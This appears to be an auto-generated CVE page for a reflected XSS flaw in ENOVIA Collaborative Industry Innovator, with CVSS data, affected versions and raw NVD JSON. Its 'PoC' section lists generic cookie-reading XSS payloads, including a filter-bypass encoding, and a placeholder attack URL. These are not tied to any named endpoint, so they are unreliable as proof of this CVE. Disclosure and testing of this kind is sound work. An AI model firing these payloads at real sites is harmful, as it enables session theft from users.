Security Vulnerability Report
CVE-2025-12956 CVSS 8.7 HIGH


Published: 2025-12-08 09:15:46
Last Modified: 2026-01-12 18:49:43

Description

A reflected Cross-site Scripting (XSS) vulnerability affecting ENOVIA Collaborative Industry Innovator from Release 3DEXPERIENCE R2022x through Release 3DEXPERIENCE R2025x allows an attacker to execute arbitrary script code in a user's browser session.

CVSS Details

CVSS Score: 8.7
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:3ds:3dexperience_enovia:*:*:*:*:*:*:*:* - VULNERABLE
ENOVIA Collaborative Industry Innovator R2022x
ENOVIA Collaborative Industry Innovator R2023x
ENOVIA Collaborative Industry Innovator R2024x
ENOVIA Collaborative Industry Innovator R2025x

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CVE-2025-12956 Reflected XSS PoC -->
<!-- Target: ENOVIA Collaborative Industry Innovator R2022x-R2025x -->

<!-- Basic XSS payload in URL parameter -->
<script>alert(document.cookie)</script>

<!-- Encoded version for bypassing filters -->
%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

<!-- Event handler payload -->
<img src=x onerror=alert(document.domain)>

<!-- SVG-based payload -->
<svg/onload=alert(document.cookie)>

<!-- Sample attack URL structure -->
<!-- https://[target-host]/[vulnerable-endpoint]?param=<script>alert(document.cookie)</script> -->

References

https://www.3ds.com/trust-center/security/security-advisories/cve-2025-12956 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12956", "sourceIdentifier": "[email protected]", "published": "2025-12-08T09:15:46.080", "lastModified": "2026-01-12T18:49:43.023", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A reflected Cross-site Scripting (XSS) vulnerability affecting ENOVIA Collaborative Industry Innovator from Release 3DEXPERIENCE R2022x through Release 3DEXPERIENCE R2025x allows an attacker to execute arbitrary script code in user's browser session."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 5.8}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:3ds:3dexperience_enovia:*:*:*:*:*:*:*:*", "versionStartIncluding": "r2022x", "versionEndIncluding": "r2025x", "matchCriteriaId": "ED13CC58-ACBD-48A3-B370-528F7F8D3ABF"}]}]}], "references": [{"url": "https://www.3ds.com/trust-center/security/security-advisories/cve-2025-12956", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}